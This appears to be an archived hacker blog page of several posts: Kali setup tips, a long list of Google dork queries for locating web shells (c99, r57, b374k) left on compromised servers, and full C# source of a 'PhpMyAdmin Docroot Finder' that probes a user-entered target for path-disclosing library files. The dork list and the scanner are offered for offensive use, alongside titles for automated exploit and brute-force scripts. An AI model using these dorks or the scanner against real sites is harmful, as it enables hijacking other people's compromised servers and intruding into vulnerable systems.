InsidePro (Full) - 21	5000000	51 MB	05/15/2011
InsidePro (Full) - 22	5000000	51 MB	08/15/2011
InsidePro (Full) - 23	5000000	52 MB	08/15/2011
InsidePro (Full) - 24	5000000	51 MB	08/15/2011
InsidePro (Full) - 25	5000000	53 MB	01/16/2012
InsidePro (Full) - 26	5000000	53 MB	01/16/2012
InsidePro (Full) - 27	5000000	51 MB	01/16/2012
InsidePro (Full) - 28	5000000	51 MB	01/16/2012
InsidePro (Full) - 29	5000000	51 MB	01/16/2012
InsidePro (Full) - 30	5000000	47 MB	01/16/2012
InsidePro (Full) - 31	4045162	40 MB	01/16/2012

PasswordsPro	2937126	30 MB	11/18/2010

Have pfun ;) Thanks to InsidePro

Wednesday, October 2, 2013

Security is just an Illusion Wallpaper

Posted by Security is just an illusion at Wednesday, October 02, 2013

Im bored as hell atm cant beat the 2 Part of The FC4.me challenge.

Need to learn some assembly reverse engineering.

Have pfun

Wednesday, August 7, 2013

No Donations

Posted by Security is just an illusion at Wednesday, August 07, 2013

Sry Too all Readers there is Not Enough Love In The World ;)

Add Adfly to blog to earn some money.
I hate adfly too ......
But Sry need some new hardware and some new toys ;) Sry Sry Sry .....

Pwnpad

More GPUs
Rasberry Pi Board

and others stuff
Next Blogs Post Coming Soon ... Stay Tuned

HINT:Adblock

I got Big dreams but no money to fund my own business.Donate If you found that Security is just an Illusion are useful for you,please support this site by making a donation.Feel free to make any amount of donation by PayPal. Thank you :)

Thursday, May 23, 2013

The DarkSite of Pastebin “PasteLoggers”

Posted by Security is just an illusion at Thursday, May 23, 2013

This summary is not available. Please click here to view the post.

Saturday, May 18, 2013

From Dork to Shell

Posted by Security is just an illusion at Saturday, May 18, 2013

Just waiting for New Hardware ….. Need more Power to Hack the Gibson ^^_°

Here Some Dorks for php shell Zwinkerndes Smiley Google make it very simple to get Shell and other good stuff for Hacker …..

https://encrypted.google.com/search?q=intitle:%22-N3t%22%20filetype:php%20undetectable

https://encrypted.google.com/search?q=intitle:awen+intitle:asp.net

https://encrypted.google.com/search?q=intitle%3A%23k4raeL+-+sh3LL

https://encrypted.google.com/search?q=MySQL:%20ON%20MSSQL:%20OFF%20Oracle:%20OFF%20MSSQL:%20OFF%20PostgreSQL:%20OFF%20cURL:%20ON%20WGet:%20ON%20Fetch:%20OFF%20Perl:%20ON

https://encrypted.google.com/search?q=%22www.*.com+-+c99shell%22+OR+%22www.*.net+-+c99shell%22+OR+%22www.*.org+-+c99shell%22

inurl:r57.php [ phpinfo ]  [ php.ini ]  [ cpu ]  [ mem ]  [ users ]  [ tmp ]  [ delete ]
"r57shell 1.4"
"[ phpinfo ]  [ php.ini ]  [ cpu ]  [ mem ]  [ users ]  [ tmp ]  [ delete ]"

inurl:b374k.php
inurl:c99.php
inurl:c100.php Generation time:
inurl:itsecteam_shell.php
inurl:"c99.php" inurl:c99.php inurl:c99.php inurl:c99.php allinurl:c99.php inurl:"c99.php" inurl:c99.php intitle:c99shell uname c99shell v.1.0 (roots) inurl:/c99.php allinurl:.c99.php allinurl:.c99.php intitle:C99Shell allintitle:"C99Shell" allintitle:"C99Shell" c99.php ccteam.ru c99.php
intext:c99shell inurl:c99.php
!C99Shell v. 1.0 pre-release build #16!
intitle:c99shell filetype:php
inurl:c99.php
inurl:"/c99.php"
allinurl:c99.php
c99shell v. 1.0 pre-release build #5
"inurl:c99.php" + "intext:safe"
--[ c99shell v. 1.0 pre-release build #12 powered by Captain Crunch Security Team
c99.php download
intitle:r57shell | intitle:c99shell +uname
inurl:minimail c99
!C99Shell v. 1.0 pre-release build # +php -htm -html -shtml
allintitle: c99shell filetype:php
inurl:c99.php uid=0(root)
inurl:c99.php
inurl:/files/c99.php
intitle:c99shell safe-mode:OFF
c99.php "uid=0"
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
inurl:c99.php uid=0(root)
allintitle: "c99shell"
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
c99. PHP-code Feedback Self remove
c99shell filetype:php -echo
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:c99shell +filetype:php
intitle:C99Shell v. 1.0 pre-release +uname
!C99Shell v. 1.0 pre-release build #5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #16!
c99shell v. 1.0 pre-release build #16
intitle:c99shell intext:uname
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:c99shell uname -bbpress
B64 PHP Shell © The Defaced - Created by Kr3w
intitle:madspot team  shell
inurl:".php?act=exploits"
inurl:".php?act=tools"
inurl:".php?act=encoder"
inurl:".php?act=proxy"
inurl:".php?act=shbd"
inurl:".php?act=fsbuff"
inurl:".php?act=rip"
inurl:".php?act=update"
inurl:".php?act=cmd="
!C2007Shell v. 1.0 pre-release build #16!
-[ c2007shell v. 1.0 pre-release build #16 Modded by Adora & u9 h4c93r| Adora Security Pwnz j00!  |
inurl:.php “cURL: ON MySQL: ON MSSQL: OFF”
“Shell” filetype:php intext:”uname -a:” “EDT 2010?
intitle:”intitle:r57shell” [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]
inurl:”c99.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:”c100.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:”Shell” inurl:”.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update

Saturday, May 11, 2013

Installing Teamviewer 8 on Kali 64bit (Debian)

Posted by Security is just an illusion at Saturday, May 11, 2013

Installing Teamviewer 64bit on Kali OS.
While I was trying to install Teamviewer on my 64 bit Kali OS install,I ran into some missing dependencies. One of them was a i386 package, which cannot be installed on 64 bit unless multiple architecture support is enabled in your Install.
For this we first allow i386 to be installed as a multiarch.
root@kali:/home/cr4shyy/Downloads# dpkg --add-architecture i386
Now we need to update our repositories.
root@kali:/home/cr4shyy/Downloads# apt-get update

Now we can deploy i386 packages on 64 bit as multiarch

Now time to install the package.

cr4shyy@kali:~/Downloads$ sudo dpkg -i teamviewer_linux_x64.deb

You will get errors for unmet dependency which can be installed by using following command

cr4shyy@kali:~/Downloads$ sudo apt-get install -f

and it should be good to go.

Saturday, April 20, 2013

Security is just an Illusion OS Dev “Build a Custom Kali ISO”

Posted by Security is just an illusion at Saturday, April 20, 2013

Hallo to all some weeks i got no Time for Blogging Sry Zwinkerndes Smiley But now i got some Infos for you how to build your own Custom Kali Iso.

Its Very Easy but its take some time to Build you Own Kali Live Distro.

apt-get install git live-build cdebootstrap kali-archive-keyring
git clone git://git.kali.org/live-build-config.git
cd live-build-config
lb config

1.Get needed Pakets
2.clone source with git
3.change folder
4.lb config
5.Fix the Error you will see on the cmd output how to link it.
6.Open “nano live-build-config\config\package-lists\kali.list.chroot”
7.Now you can add some Pakets ,here is my Paket List.

# Some tools add by cr4shyyy ;)
flashplugin-nonfree
software-center
radiotray
recordmydesktop
vidalia
lxrandr
bum
cmatrix
unetbootin
virtualbox-ose
gnome-system-tools
firestarter
pidgin
mumble
wicd-gtk
shutter
docky
sysinfo
gnome-nettool
secpanel
netbeans
eclipse
htop
filezilla
xchat
gimp
tora
pgadmin3
emma
conky-all
conky
gnome-tweak-tool

8.Save and lb build or add some Extra Changes Like background add Kernel Tweaks and Others.
9.Smile Zwinkerndes Smiley and Share your New Customer Kali Live Build.
Best way is Install Kali into Vmware or other.And than Compile Kali Live.
Here Some Doc About it : http://docs.kali.org/live-build/live-build-a-custom-kali-iso

Download SecOs Here : SecOs Beta (Folder Link) 2.8 Gb Iso 53x50mb Parts Splittet.

https://mega.co.nz/#F!occmWZba!d2qHdlwP-mpOso-sPLqirA

PS: On the Top you find some Security is just an illuison Whallpaper.If anybody like it and sry for the crap VidHoster i forget my Youtube Acc hrhr ... Zwinkerndes Smiley

Friday, March 29, 2013

PhpMyAdmin Docroot Finder v1

Posted by Security is just an illusion at Friday, March 29, 2013

Just find some old tool from me,if anybody need it Have pfun Zwinkerndes Smiley

PhpMyAdmin Docroot Finder v1 simple search for vuln phpmyadmin php files and give you the doc root if phpmyadmin vuln.

Download :

PhpMyAdmin Docroot Finder v1.rar (4 KB)

or http://www.mirrorupload.net/file/AFULMCDC/#!PhpMyAdmin+Docroot+Finder+v1.rar

Source :

using System;
using System.Collections.Generic;
using System.Net;
using System.IO;
using System.Text;

namespace ConsoleApplication1
{
    class Program
    {
        static void Main(string[] args)
        {

Console.Write("---------------------------------------------------------------|\n");
Console.Write("---------------------------------------------------------------|\n");
Console.Write("                                                                \n");
Console.Write("                              !                                 \n");
Console.Write("                            (-.-)                               \n");
Console.Write("   --------------------oOO---(_)---OOo----------------------|   \n");
Console.Write("   | PhpMyAdmin Docroot Finder v1 by cr4shyyy               |   \n");
Console.Write("   ---------------------------------------------------------|   \n");
Console.Write("                                                                \n");
Console.Write("                                                                \n");
Console.Write("---------------------------------------------------------------|\n");
Console.Write("---------------------------------------------------------------|\n");
Console.Write("[!] Discovered: cr4shhyyy form German Cyber Elite Army\n");
Console.Write("[!] Site: http://g0t-r00t.gov\n");
Console.Write("[!] Download: http://sourceforge.net/projects/phpmyadmin/files/ \n");
Console.Write("[!] Version: 1.0 \n");
Console.Write("[!] Date: 23.11.2012\n");
Console.Write("[!] Remote: yes\n");
Console.Write("[!] Google Dork: allinurl:index.php?db=information_schema\n");
Console.Write("[!] Google Dork: phpMyAdmin - 2.8.1 index of\n");
Console.Write("[!] Tested: Windows 7 x64\n");
Console.Write("------------------------------------------------------------\n");

string str;

Console.WriteLine("Enter some Target:");
str = Console.ReadLine();
Console.WriteLine("Taget and Fire ...: " + str);


          try
            {
            //Our getVars, to test the get of our php. 
            //We can get a page without any of these vars too though.
            string getVars = "libraries/db_table_exists.lib.php";
            //Initialization, we use localhost, change if applicable
            HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
                (string.Format(str + "{0}", getVars));
            //This time, our method is GET.
            WebReq.Method = "GET";
            //From here on, it's all the same as above.
            HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
            //Let's show some information about the response
            //Console.WriteLine(WebResp.StatusCode);
            //Console.WriteLine(WebResp.Server);

            //Now, we read the response (the string), and output it.
            Stream Answer = WebResp.GetResponseStream();
            StreamReader _Answer = new StreamReader(Answer);
            Console.WriteLine("--------------------------------------------------------------------------------------------------------");
            Console.WriteLine(_Answer.ReadToEnd());
            Console.WriteLine("--------------------------------------------------------------------------------------------------------");
            //Congratulations, with these two functions in basic form, you just learned
            //the two basic forms of web surfing
            //This proves how easy it can be.
            
              
            //start_get();

            }  

             catch
                {
                  }
                  // Error: Use of unassigned local variable '404 Not Found'.
                   Console.Write("404 Not Found !!!\n");
                   //start_get();
                   try
                   {
                       //Our getVars, to test the get of our php. 
                       //We can get a page without any of these vars too though.
                       string getVars = "libraries/bookmark.lib.php";
                       //Initialization, we use localhost, change if applicable
                       HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
                          (string.Format(str + "{0}", getVars));
                       //This time, our method is GET.
                       WebReq.Method = "GET";
                       //From here on, it's all the same as above.
                       HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
                       //Let's show some information about the response
                       //Console.WriteLine(WebResp.StatusCode);
                       //Console.WriteLine(WebResp.Server);

                       //Now, we read the response (the string), and output it.
                       Stream Answer = WebResp.GetResponseStream();
                       StreamReader _Answer = new StreamReader(Answer);
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       Console.WriteLine(_Answer.ReadToEnd());
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       //Congratulations, with these two functions in basic form, you just learned
                       //the two basic forms of web surfing
                       //This proves how easy it can be.
                   }
                   catch
                   {
                       // Error: Use of unassigned local variable '404 Not Found'.
                       Console.Write("404 Not Found !!!\n");
                   }
                   try
                   {
                       //Our getVars, to test the get of our php. 
                       //We can get a page without any of these vars too though.
                       string getVars = "libraries/check_user_privileges.lib.php";
                       //Initialization, we use localhost, change if applicable
                       HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
                           (string.Format(str + "{0}", getVars));
                       //This time, our method is GET.
                       WebReq.Method = "GET";
                       //From here on, it's all the same as above.
                       HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
                       //Let's show some information about the response
                       //Console.WriteLine(WebResp.StatusCode);
                       //Console.WriteLine(WebResp.Server);

                       //Now, we read the response (the string), and output it.
                       Stream Answer = WebResp.GetResponseStream();
                       StreamReader _Answer = new StreamReader(Answer);
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       Console.WriteLine(_Answer.ReadToEnd());
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       //Congratulations, with these two functions in basic form, you just learned
                       //the two basic forms of web surfing
                       //This proves how easy it can be.
                   }
                   catch
                   {
                       // Error: Use of unassigned local variable '404 Not Found'.
                       Console.Write("404 Not Found !!!\n");
                   }
                   try
                   {
                       //Our getVars, to test the get of our php. 
                       //We can get a page without any of these vars too though.
                       string getVars = "libraries/common.inc.php";
                       //Initialization, we use localhost, change if applicable
                       HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
                           (string.Format(str + "{0}", getVars));
                       //This time, our method is GET.
                       WebReq.Method = "GET";
                       //From here on, it's all the same as above.
                       HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
                       //Let's show some information about the response
                       //Console.WriteLine(WebResp.StatusCode);
                       //Console.WriteLine(WebResp.Server);

                       //Now, we read the response (the string), and output it.
                       Stream Answer = WebResp.GetResponseStream();
                       StreamReader _Answer = new StreamReader(Answer);
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       Console.WriteLine(_Answer.ReadToEnd());
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       //Congratulations, with these two functions in basic form, you just learned
                       //the two basic forms of web surfing
                       //This proves how easy it can be.
                   }
                   catch
                   {
                       // Error: Use of unassigned local variable '404 Not Found'.
                       Console.Write("404 Not Found !!!\n");
                   }
                   try
                   {
                       //Our getVars, to test the get of our php. 
                       //We can get a page without any of these vars too though.
                       string getVars = "libraries/database_interface.lib.php";
                       //Initialization, we use localhost, change if applicable
                       HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
                         (string.Format(str + "{0}", getVars));
                       //This time, our method is GET.
                       WebReq.Method = "GET";
                       //From here on, it's all the same as above.
                       HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
                       //Let's show some information about the response
                       //Console.WriteLine(WebResp.StatusCode);
                       //Console.WriteLine(WebResp.Server);

                       //Now, we read the response (the string), and output it.
                       Stream Answer = WebResp.GetResponseStream();
                       StreamReader _Answer = new StreamReader(Answer);
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       Console.WriteLine(_Answer.ReadToEnd());
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       //Congratulations, with these two functions in basic form, you just learned
                       //the two basic forms of web surfing
                       //This proves how easy it can be.
                   }
                   catch
                   {
                       // Error: Use of unassigned local variable '404 Not Found'.
                       Console.Write("404 Not Found !!!\n");
                   }
                   try
                   {
                       //Our getVars, to test the get of our php. 
                       //We can get a page without any of these vars too though.
                       string getVars = "libraries/db_info.inc.php";
                       //Initialization, we use localhost, change if applicable
                       HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
                          (string.Format(str + "{0}", getVars));
                       //This time, our method is GET.
                       WebReq.Method = "GET";
                       //From here on, it's all the same as above.
                       HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
                       //Let's show some information about the response
                       //Console.WriteLine(WebResp.StatusCode);
                       //Console.WriteLine(WebResp.Server);

                       //Now, we read the response (the string), and output it.
                       Stream Answer = WebResp.GetResponseStream();
                       StreamReader _Answer = new StreamReader(Answer);
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       Console.WriteLine(_Answer.ReadToEnd());
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       //Congratulations, with these two functions in basic form, you just learned
                       //the two basic forms of web surfing
                       //This proves how easy it can be.
                   }
                   catch
                   {
                       // Error: Use of unassigned local variable '404 Not Found'.
                       Console.Write("404 Not Found !!!\n");
                   }
                   try
                   {
                       //Our getVars, to test the get of our php. 
                       //We can get a page without any of these vars too though.
                       string getVars = "libraries/db_links.inc.php";
                       //Initialization, we use localhost, change if applicable
                       HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
                           (string.Format(str + "{0}", getVars));
                       //This time, our method is GET.
                       WebReq.Method = "GET";
                       //From here on, it's all the same as above.
                       HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
                       //Let's show some information about the response
                       //Console.WriteLine(WebResp.StatusCode);
                       //Console.WriteLine(WebResp.Server);

                       //Now, we read the response (the string), and output it.
                       Stream Answer = WebResp.GetResponseStream();
                       StreamReader _Answer = new StreamReader(Answer);
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       Console.WriteLine(_Answer.ReadToEnd());
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       //Congratulations, with these two functions in basic form, you just learned
                       //the two basic forms of web surfing
                       //This proves how easy it can be.
                   }
                   catch
                   {
                       // Error: Use of unassigned local variable '404 Not Found'.
                       Console.Write("404 Not Found !!!\n");
                   }
                   try
                   {
                       //Our getVars, to test the get of our php. 
                       //We can get a page without any of these vars too though.
                       string getVars = "libraries/display_change_password.lib.php";
                       //Initialization, we use localhost, change if applicable
                       HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
                          (string.Format(str + "{0}", getVars));
                       //This time, our method is GET.
                       WebReq.Method = "GET";
                       //From here on, it's all the same as above.
                       HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
                       //Let's show some information about the response
                       //Console.WriteLine(WebResp.StatusCode);
                       //Console.WriteLine(WebResp.Server);

                       //Now, we read the response (the string), and output it.
                       Stream Answer = WebResp.GetResponseStream();
                       StreamReader _Answer = new StreamReader(Answer);
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       Console.WriteLine(_Answer.ReadToEnd());
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       //Congratulations, with these two functions in basic form, you just learned
                       //the two basic forms of web surfing
                       //This proves how easy it can be.
                   }
                   catch
                   {
                       // Error: Use of unassigned local variable '404 Not Found'.
                       Console.Write("404 Not Found !!!\n");
                   }
                   try
                   {
                       //Our getVars, to test the get of our php. 
                       //We can get a page without any of these vars too though.
                       string getVars = "libraries/display_create_database.lib.php";
                       //Initialization, we use localhost, change if applicable
                       HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
                          (string.Format(str + "{0}", getVars));
                       //This time, our method is GET.
                       WebReq.Method = "GET";
                       //From here on, it's all the same as above.
                       HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
                       //Let's show some information about the response
                       //Console.WriteLine(WebResp.StatusCode);
                       //Console.WriteLine(WebResp.Server);

                       //Now, we read the response (the string), and output it.
                       Stream Answer = WebResp.GetResponseStream();
                       StreamReader _Answer = new StreamReader(Answer);
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       Console.WriteLine(_Answer.ReadToEnd());
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       //Congratulations, with these two functions in basic form, you just learned
                       //the two basic forms of web surfing
                       //This proves how easy it can be.
                   }
                   catch
                   {
                       // Error: Use of unassigned local variable '404 Not Found'.
                       Console.Write("404 Not Found !!!\n");
                   }
                   try
                   {
                       //Our getVars, to test the get of our php. 
                       //We can get a page without any of these vars too though.
                       string getVars = "test/AllTests.php";
                       //Initialization, we use localhost, change if applicable
                       HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
                          (string.Format(str + "{0}", getVars));
                       //This time, our method is GET.
                       WebReq.Method = "GET";
                       //From here on, it's all the same as above.
                       HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
                       //Let's show some information about the response
                       //Console.WriteLine(WebResp.StatusCode);
                       //Console.WriteLine(WebResp.Server);

                       //Now, we read the response (the string), and output it.
                       Stream Answer = WebResp.GetResponseStream();
                       StreamReader _Answer = new StreamReader(Answer);
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       Console.WriteLine(_Answer.ReadToEnd());
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       //Congratulations, with these two functions in basic form, you just learned
                       //the two basic forms of web surfing
                       //This proves how easy it can be.
                   }
                   catch
                   {
                       // Error: Use of unassigned local variable '404 Not Found'.
                       Console.Write("404 Not Found !!!\n");
                   }
                   try
                   {
                       //Our getVars, to test the get of our php. 
                       //We can get a page without any of these vars too though.
                       string getVars = "test/Environment_test.php";
                       //Initialization, we use localhost, change if applicable
                       HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
                          (string.Format(str + "{0}", getVars));
                       //This time, our method is GET.
                       WebReq.Method = "GET";
                       //From here on, it's all the same as above.
                       HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
                       //Let's show some information about the response
                       //Console.WriteLine(WebResp.StatusCode);
                       //Console.WriteLine(WebResp.Server);

                       //Now, we read the response (the string), and output it.
                       Stream Answer = WebResp.GetResponseStream();
                       StreamReader _Answer = new StreamReader(Answer);
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       Console.WriteLine(_Answer.ReadToEnd());
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       //Congratulations, with these two functions in basic form, you just learned
                       //the two basic forms of web surfing
                       //This proves how easy it can be.
                   }
                   catch
                   {
                       // Error: Use of unassigned local variable '404 Not Found'.
                       Console.Write("404 Not Found !!!\n");
                   }
                   try
                   {
                       //Our getVars, to test the get of our php. 
                       //We can get a page without any of these vars too though.
                       string getVars = "test/FailTest.php";
                       //Initialization, we use localhost, change if applicable
                       HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
                          (string.Format(str + "{0}", getVars));
                       //This time, our method is GET.
                       WebReq.Method = "GET";
                       //From here on, it's all the same as above.
                       HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
                       //Let's show some information about the response
                       //Console.WriteLine(WebResp.StatusCode);
                       //Console.WriteLine(WebResp.Server);

                       //Now, we read the response (the string), and output it.
                       Stream Answer = WebResp.GetResponseStream();
                       StreamReader _Answer = new StreamReader(Answer);
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       Console.WriteLine(_Answer.ReadToEnd());
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       //Congratulations, with these two functions in basic form, you just learned
                       //the two basic forms of web surfing
                       //This proves how easy it can be.
                   }
                   catch
                   {
                       // Error: Use of unassigned local variable '404 Not Found'.
                       Console.Write("404 Not Found !!!\n");
                   }
                   try
                   {
                       //Our getVars, to test the get of our php. 
                       //We can get a page without any of these vars too though.
                       string getVars = "test/PMA_STR_sub_test.php";
                       //Initialization, we use localhost, change if applicable
                       HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
                          (string.Format(str + "{0}", getVars));
                       //This time, our method is GET.
                       WebReq.Method = "GET";
                       //From here on, it's all the same as above.
                       HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
                       //Let's show some information about the response
                       //Console.WriteLine(WebResp.StatusCode);
                       //Console.WriteLine(WebResp.Server);

                       //Now, we read the response (the string), and output it.
                       Stream Answer = WebResp.GetResponseStream();
                       StreamReader _Answer = new StreamReader(Answer);
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       Console.WriteLine(_Answer.ReadToEnd());
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       //Congratulations, with these two functions in basic form, you just learned
                       //the two basic forms of web surfing
                       //This proves how easy it can be.
                   }
                   catch
                   {
                       // Error: Use of unassigned local variable '404 Not Found'.
                       Console.Write("404 Not Found !!!\n");
                   }
                   try
                   {
                       //Our getVars, to test the get of our php. 
                       //We can get a page without any of these vars too though.
                       string getVars = "test/PMA_escapeJsString_test.php";
                       //Initialization, we use localhost, change if applicable
                       HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
                          (string.Format(str + "{0}", getVars));
                       //This time, our method is GET.
                       WebReq.Method = "GET";
                       //From here on, it's all the same as above.
                       HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
                       //Let's show some information about the response
                       //Console.WriteLine(WebResp.StatusCode);
                       //Console.WriteLine(WebResp.Server);

                       //Now, we read the response (the string), and output it.
                       Stream Answer = WebResp.GetResponseStream();
                       StreamReader _Answer = new StreamReader(Answer);
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       Console.WriteLine(_Answer.ReadToEnd());
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       //Congratulations, with these two functions in basic form, you just learned
                       //the two basic forms of web surfing
                       //This proves how easy it can be.
                   }
                   catch
                   {
                       // Error: Use of unassigned local variable '404 Not Found'.
                       Console.Write("404 Not Found !!!\n");
                   }
                   try
                   {
                       //Our getVars, to test the get of our php. 
                       //We can get a page without any of these vars too though.
                       string getVars = "test/PMA_get_real_size_test.php";
                       //Initialization, we use localhost, change if applicable
                       HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
                          (string.Format(str + "{0}", getVars));
                       //This time, our method is GET.
                       WebReq.Method = "GET";
                       //From here on, it's all the same as above.
                       HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
                       //Let's show some information about the response
                       //Console.WriteLine(WebResp.StatusCode);
                       //Console.WriteLine(WebResp.Server);

                       //Now, we read the response (the string), and output it.
                       Stream Answer = WebResp.GetResponseStream();
                       StreamReader _Answer = new StreamReader(Answer);
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       Console.WriteLine(_Answer.ReadToEnd());
                       Console.WriteLine("--------------------------------------------------------------------------------------------------------");
                       //Congratulations, with these two functions in basic form, you just learned
                       //the two basic forms of web surfing
                       //This proves how easy it can be.
                   }
                   catch
                   {
                       // Error: Use of unassigned local variable '404 Not Found'.
                       Console.Write("404 Not Found !!!\n");
                   }
              }



        private static void start_get()
        {




        }
    }
}

Pages

Tuesday, December 10, 2013

Auto Payload Menu meets Cobalt Strike Script Engine

Saturday, December 7, 2013

Shodanhq meets Cobalt Strike Script Engine

Friday, December 6, 2013

Contana Script Engine Lesson 1

Custom Armitage Menu via Cortana scripts

Contana Script Engine Lesson 2

Custom Armitage Tor Network Menu via Cortana scripts

Contana Script Engine Lesson 2

Custom Armitage Sqlmap Interface Menu via Cortana scripts

Contana Script Engine Lesson 3

Custom Armitage on Host add Auto TCP Port Quick Scan via Cortana scripts

Contana Script Engine Lesson 4

Custom Armitage on Host add && port 22 found Auto Bruteforce via Cortana scripts

Brute New Host with MSSQL Server Ready on it

Contana Script Engine Lesson 4

Custom Armitage on Host add Auto Exploit via Cortana scripts

Friday, November 29, 2013

Wednesday, October 2, 2013

Wednesday, August 7, 2013

Thursday, May 23, 2013

Saturday, May 18, 2013

Saturday, May 11, 2013

Saturday, April 20, 2013

Friday, March 29, 2013

[#] iNFO [#]